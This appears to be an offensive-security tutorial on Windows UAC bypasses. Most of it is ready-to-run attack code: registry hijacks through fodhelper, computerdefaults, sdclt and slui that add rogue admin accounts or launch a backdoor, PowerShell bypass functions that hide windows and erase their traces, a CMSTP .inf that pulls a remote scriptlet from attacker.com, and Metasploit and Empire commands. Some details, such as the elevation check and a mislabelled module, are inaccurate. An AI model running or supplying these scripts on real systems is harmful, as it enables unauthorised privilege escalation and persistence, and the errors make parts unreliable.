UAC bypass techniques

Understanding User Account Control (UAC)

What Is User Account Control?

User Account Control (UAC) is like a security checkpoint at an airport. Even if you have a valid ticket (administrator account), you still need to go through additional screening (UAC prompt) before accessing restricted areas (performing administrative tasks).

UAC was introduced in Windows Vista to reduce the attack surface by running applications with limited privileges by default, even when logged in as an administrator.

How UAC Works

UAC Integrity Levels:

• System - Highest level, used by system services

• High - Used by elevated administrative processes

• Medium - Standard user level, default for most applications

• Low - Used by sandboxed applications like web browsers

UAC Process Flow:

1. User attempts administrative action (installing software, modifying system files)

2. Windows checks current integrity level and required permissions

3. If elevation needed, UAC displays consent/credential prompt

4. If approved, Windows creates new process with High integrity level

5. Administrative action proceeds with elevated privileges

Real-World UAC Example

Without UAC (Windows XP era):

• All applications run with full administrative rights

• Malware has immediate system access

• No protection against privilege escalation

With UAC (Modern Windows):

• Applications run with limited rights by default

• Administrative actions require explicit consent

• Creates barrier against automatic privilege escalation

UAC Bypass Fundamentals

UAC bypass techniques exploit specific Windows features or applications that are configured to automatically elevate privileges without showing a UAC prompt. These are called "auto-elevate" executables.

Why UAC Bypasses Work

Trusted Applications: Some Windows applications are marked as "auto-elevate" and can request high privileges without UAC prompts:

• Built-in Windows utilities

• Digitally signed Microsoft applications

• Applications with specific manifest settings

Common Bypass Methods:

1. Registry Manipulation - Modify registry keys that control auto-elevate behavior

2. File System Redirection - Abuse Windows file system redirections

3. Process Injection - Inject code into trusted processes

4. Application Manifest Abuse - Exploit auto-elevate application configurations

Enumeration

Checking Current UAC Status

Check UAC configuration:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin

UAC level interpretation:

• EnableLUA = 0 - UAC completely disabled

• EnableLUA = 1 - UAC enabled

• ConsentPromptBehaviorAdmin values:

  • 0 - Never notify (no UAC prompts)

  • 2 - Always notify (traditional UAC)

  • 5 - Notify me only when apps try to make changes (default)

PowerShell UAC status check:

# Check if running with high integrity
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
$isAdmin = $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

if ($isAdmin) {
    Write-Output "[+] Running with administrative privileges"
} else {
    Write-Output "[-] Running with standard user privileges"
}

# Check UAC settings
$uacEnabled = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System").EnableLUA
$promptBehavior = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System").ConsentPromptBehaviorAdmin

Write-Output "UAC Enabled: $uacEnabled"
Write-Output "Prompt Behavior: $promptBehavior"

Identifying Bypass Opportunities

Find auto-elevate applications:

# Search for applications with auto-elevate capability
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /s | findstr /i "RUNASADMIN"

PowerShell auto-elevate enumeration:

# Find executables with requireAdministrator in manifest
$systemApps = Get-ChildItem "C:\Windows\System32\*.exe" | ForEach-Object {
    try {
        $manifest = [System.Reflection.Assembly]::ReflectionOnlyLoadFrom($_.FullName).GetManifestResourceNames()
        if ($manifest -like "*manifest*") {
            [PSCustomObject]@{
                Name = $_.Name
                Path = $_.FullName
                HasManifest = $true
            }
        }
    } catch {
        # Ignore errors for non-.NET executables
    }
}

---

Registry and File System UAC Bypasses

Understanding Registry-Based Bypasses

Registry-based UAC bypasses exploit the fact that certain registry locations can be modified without elevation, but changes to these locations can affect how elevated applications behave.

Registry Key Hijacking

Many Windows applications read configuration from the registry. If an attacker can modify these registry keys, they can potentially control the behavior of elevated applications.

Common vulnerable registry locations:

• HKCU\Software\Classes - User-specific file associations

• HKCU\Environment - User environment variables

• HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths - Application paths

FODHELPER UAC Bypass

FODHELPER is a Windows feature that manages optional features and is marked for auto-elevation.

How FODHELPER Bypass Works

Attack methodology:

1. FODHELPER reads registry keys under current user context

2. Attacker modifies HKCU registry to control FODHELPER behavior

3. FODHELPER auto-elevates without UAC prompt

4. Executes attacker-controlled payload with high privileges

FODHELPER Exploitation

Registry modification method:

# Create malicious registry entry
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "cmd.exe /c net user hacker Password123! /add" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /t REG_SZ /f

# Trigger FODHELPER
fodhelper.exe

# Cleanup
reg delete "HKCU\Software\Classes\ms-settings" /f

PowerShell FODHELPER bypass:

# Function to perform FODHELPER UAC bypass
function Invoke-FodHelperBypass {
    param([string]$Command = "cmd.exe")
    
    try {
        # Create registry structure
        New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force | Out-Null
        
        # Set command to execute
        Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $Command
        Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value ""
        
        Write-Output "[+] Registry entries created"
        Write-Output "[+] Executing fodhelper.exe..."
        
        # Execute fodhelper
        Start-Process "fodhelper.exe" -WindowStyle Hidden
        
        # Wait and cleanup
        Start-Sleep -Seconds 3
        Remove-Item -Path "HKCU:\Software\Classes\ms-settings" -Recurse -Force
        
        Write-Output "[+] UAC bypass completed, registry cleaned"
        
    } catch {
        Write-Error "Failed to execute UAC bypass: $($_.Exception.Message)"
    }
}

# Example usage
Invoke-FodHelperBypass -Command "powershell.exe -Command 'Start-Process cmd -Verb RunAs'"

COMPUTERDEFAULTS UAC Bypass

Similar to FODHELPER, computerdefaults.exe is another auto-elevate application.

Attack execution:

# Setup registry hijack
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "C:\Users\Public\backdoor.exe" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /t REG_SZ /f

# Execute computerdefaults
computerdefaults.exe

Environment Variable UAC Bypass

This technique abuses Windows environment variable expansion in elevated contexts.

SystemPropertiesAdvanced bypass:

# Set malicious environment variable
setx PATH "C:\Users\Public;%PATH%"

# Place malicious executable
copy backdoor.exe C:\Users\Public\DismHost.exe

# Trigger elevated process that uses PATH
SystemPropertiesAdvanced.exe

---

Application and Process UAC Bypasses

DLL Hijacking UAC Bypasses

Many auto-elevate applications are vulnerable to DLL hijacking, allowing attackers to execute code in elevated context.

CMSTP UAC Bypass

CMSTP (Connection Manager Profile Installer) can be abused to bypass UAC using a malicious .inf file.

CMSTP bypass methodology:

1. Create malicious .inf file with embedded commands

2. Use CMSTP to process the .inf file

3. CMSTP auto-elevates and executes embedded commands

CMSTP exploitation:

# Create malicious .inf file
echo [Version] > malicious.inf
echo Signature=$chicago$ >> malicious.inf
echo AdvancedINF=2.5 >> malicious.inf
echo [DefaultInstall_SingleUser] >> malicious.inf
echo UnRegisterOCXs=UnRegisterOCXSection >> malicious.inf
echo [UnRegisterOCXSection] >> malicious.inf
echo %%11%%\scrobj.dll,NI,http://attacker.com/payload.sct >> malicious.inf

# Execute CMSTP bypass
cmstp.exe /ni /s malicious.inf

PowerShell CMSTP bypass:

function Invoke-CMSTPBypass {
    param([string]$PayloadURL = "http://example.com/payload.sct")
    
    $infContent = @"
[Version]
Signature=`$chicago`$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,$PayloadURL
"@
    
    $infFile = "$env:TEMP\bypass.inf"
    Set-Content -Path $infFile -Value $infContent
    
    Write-Output "[+] Created malicious .inf file: $infFile"
    Write-Output "[+] Executing CMSTP bypass..."
    
    Start-Process "cmstp.exe" -ArgumentList "/ni /s $infFile" -WindowStyle Hidden
    
    Start-Sleep -Seconds 2
    Remove-Item $infFile -Force
}

SDCLT UAC Bypass

SDCLT (Backup and Restore) is another auto-elevate application that can be abused.

SDCLT registry hijack:

# Create registry entries for SDCLT hijack
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c net user admin Password123! /add" /f
reg add "HKCU\Software\Classes\Folder\shell\open\command" /v "DelegateExecute" /t REG_SZ /f

# Execute SDCLT
sdclt.exe /KnownFolder:{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}

# Cleanup
reg delete "HKCU\Software\Classes\Folder" /f

SLUI UAC Bypass

SLUI (Software Licensing User Interface) can be exploited through file association hijacking.

SLUI exploitation:

function Invoke-SluiBypass {
    param([string]$Command)
    
    try {
        # Create hijack registry entry
        New-Item -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Force | Out-Null
        Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $Command
        Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "DelegateExecute" -Value ""
        
        # Trigger SLUI
        Start-Process "slui.exe" -WindowStyle Hidden
        
        Start-Sleep -Seconds 3
        Remove-Item -Path "HKCU:\Software\Classes\exefile" -Recurse -Force
        
        Write-Output "[+] SLUI bypass executed"
        
    } catch {
        Write-Error "SLUI bypass failed: $($_.Exception.Message)"
    }
}

Metasploit UAC Bypasses

Metasploit UAC bypass modules:

# FODHELPER bypass
use exploit/windows/local/bypassuac_fodhelper

# Event Viewer bypass
use exploit/windows/local/bypassuac_eventvwr

# SDCLT bypass
use exploit/windows/local/bypassuac_sdclt

# DiskCleanup bypass
use exploit/windows/local/bypassuac_sluihijack

Meterpreter UAC bypass:

# From meterpreter session
meterpreter > background
msf > use exploit/windows/local/bypassuac_eventvwr
msf > set SESSION 1
msf > set LHOST 192.168.1.100
msf > exploit

PowerShell Empire UAC Bypasses

Empire UAC modules:

# UACME integration
(Empire: agents) > interact [agent-name]
(Empire: [agent]) > usemodule privesc/bypassuac_eventvwr
(Empire: privesc/bypassuac_eventvwr) > execute

# FODHELPER bypass
(Empire: [agent]) > usemodule privesc/bypassuac_fodhelper
(Empire: privesc/bypassuac_fodhelper) > execute

Quick Enumeration and Testing

UACMe tool usage:

# Download UACMe and test multiple bypass methods
UACMe.exe -help

# Test specific bypass method (e.g., method 23 - FODHELPER)
UACMe.exe 23

# Test with custom payload
UACMe.exe 23 "cmd.exe /c net user test password123 /add"

PowerShell comprehensive UAC test:

function Test-UACBypasses {
    Write-Output "[+] Testing UAC bypass opportunities..."
    
    # Test FODHELPER availability
    if (Test-Path "C:\Windows\System32\fodhelper.exe") {
        Write-Output "[+] FODHELPER available for bypass"
    }
    
    # Test COMPUTERDEFAULTS availability
    if (Test-Path "C:\Windows\System32\computerdefaults.exe") {
        Write-Output "[+] COMPUTERDEFAULTS available for bypass"
    }
    
    # Test SDCLT availability
    if (Test-Path "C:\Windows\System32\sdclt.exe") {
        Write-Output "[+] SDCLT available for bypass"
    }
    
    # Check current integrity level
    $principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
    $isElevated = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    
    Write-Output "Current elevation status: $isElevated"
}

Test-UACBypasses